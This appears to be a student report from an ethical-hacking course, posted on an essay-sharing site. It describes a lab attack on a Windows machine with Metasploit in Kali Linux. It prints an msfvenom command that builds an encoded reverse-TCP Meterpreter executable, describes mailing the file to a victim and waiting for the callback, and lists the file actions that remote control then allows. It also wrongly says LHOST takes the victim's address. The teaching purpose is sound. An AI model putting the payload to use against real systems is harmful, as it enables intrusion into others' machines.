PricingBlogAbout Us

CSI3508 - Ethical Hacking: Windows Exploit with Kali Linux Metasploit

Verified

Added on  2023/06/04

|4
|822
|71
Report
AI Summary
This report outlines the development of an exploit targeting Windows operating systems using the Metasploit framework within a Kali Linux environment. The goal is to gain unauthorized access to a victim's Windows machine without physical access. Metasploit, a penetration testing tool, is used to create and execute exploit code against the target. The process involves setting up the Kali Linux environment with the necessary tools, identifying the target Windows machine's IP address and port, creating an executable file using Msfconsole, and sending this file to the victim. Once the victim opens the file, the attacker gains control through the meterpreter option, enabling activities such as file manipulation, directory changes, and even remote shutdown. The report details the commands used, the process of setting up the exploit, and the potential impact on the victim's system.
Document Page
Running Head: ICT ETHICAL HACKING 1
KALI LINUX EXPLOIT USING METASPLOIT
Student name
Institution Affiliation
Facilitator
Course
Date
tabler-icon-diamond-filled.svg

Paraphrase This Document

Need a fresh take? Get an instant paraphrase of this document with our AI Paraphraser
Document Page
ICT ETHICAL HACKING 2
The exploit developed was specifically a target to windows operating systems using
metasploit. Through the approach, I would be in a position to get into the victims computer
operating on windows platform without physically logging into the system. In its simple
definition, metasploit is a project that aids in penetration testing and ID signature
development. Using the tool, an exploit code can be developed and executed against remote
machines (Dieterle, 2016).
Some of my requirements in this development included metaSploit framework and a
Ruby containing all the Ruby packages which I installed in a Kali Linux OS machine, two OSs
(Kali Linux and Windows) installed in two different machines although at the same NAT
network. I also ensured that the target machine did not have any Antivirus running on it (Holik,
Horalek, Marik, Neradova & Zitta, 2014, p.240). The most important Metasploit Framework
command I used throughout this exploit was the Msfconsole because of its flexibility, features
and its support to the tools within the framework. The command provided me with a handy all-
in-one interface in almost all the settings under the framework.
To be able to hack into the victim’s windows operating system machine, I would need the
machines IP address and one of its PORT number which I would easily obtain since we are at the
same network with the machine. Basically, in the same network each machine‘s IP address in
that network can be viewed through any other machine under the same network if the network
administrator has not reconfigured the machines otherwise (Muniz, 2013).
An executable file is therefore created under the IP and port specifications under the Kali
Linux platform through the Msfconsole command “msfvenom –p
windows/meterpreter/reverse_tcp LHOST= (IP address of windows machine) LPORT=(PORT in
the windows machine) –f exe –e x86/shikata_ga_nai –i 10> /root/desktop/ (desktop name).exe”
Document Page
ICT ETHICAL HACKING 3
Through this command, a file is created on the Kali Linux machine and which cannot be
executed in the same platform considering the format which we have used. It appears like a
folder in this platform and which must be send to the victim through any available channel
including mail (Pritchett & De Smet, 2013).
Once the file is send, the attacker is entitled to set the metasploit platform into a listening
status using the command “exploit” while the Msfconsole command is on a handler status. So,
when set on a listening state, it awaits until the file send to the windows victim machine is
opened. Whenever the victim opens the file which has been send to his windows machine, on the
side of the attacker, the “meterpreter” option opens itself automatically.
At the point, there are a lot that can be done on the victim’s machine by the attacker as
observed when the command “help” is executed. Some of the activities the attacker can do on the
victim’s machine include reading the contents of the files on the screen, changing directories,
editing files, deleting files, searching for files, uploading files changing local directories, printing
local directories, removing directories, moving source to destination, and printing working
directories (Weidman, 2014). These activities can be achieved through different commands and
which are listed in the help command.
Considering these activities sends a clear picture that the attacker will have achieved full
control of the victim’s machine without any knowledge of his or her password to an extend of
shutting it down remotely.

This is a preview!

Do you want full access?

icon

Trusted by 1+ million students worldwide

Document Page
ICT ETHICAL HACKING 4
References
Dieterle, D. W. (2016). Basic Security Testing with Kali Linux. CreateSpace Independent
Publishing Platform.
Holik, F., Horalek, J., Marik, O., Neradova, S., & Zitta, S. (2014, November). Effective
penetration testing with Metasploit framework and methodologies. In Computational
Intelligence and Informatics (CINTI), 2014 IEEE 15th International Symposium on (pp.
237-242). IEEE.
Muniz, J. (2013). Web Penetration Testing with Kali Linux. Packt Publishing Ltd.
Pritchett, W. L., & De Smet, D. (2013). Kali Linux Cookbook. Packt Publishing Ltd
Weidman, G. (2014). Penetration testing: a hands-on introduction to hacking. No Starch Press.
chevron_up_icon
1 out of 4
circle_padding
hide_on_mobile
zoom_out_icon
logo.png

Your All-in-One AI-Powered Toolkit for Academic Success.

  +13062052269
info@desklib.com

Available 24*7 on WhatsApp / Email

[object Object]
Unlock your academic potential

Copyright © 2020–2026 A2Z Services. All Rights Reserved. Developed and managed by ZUCOL.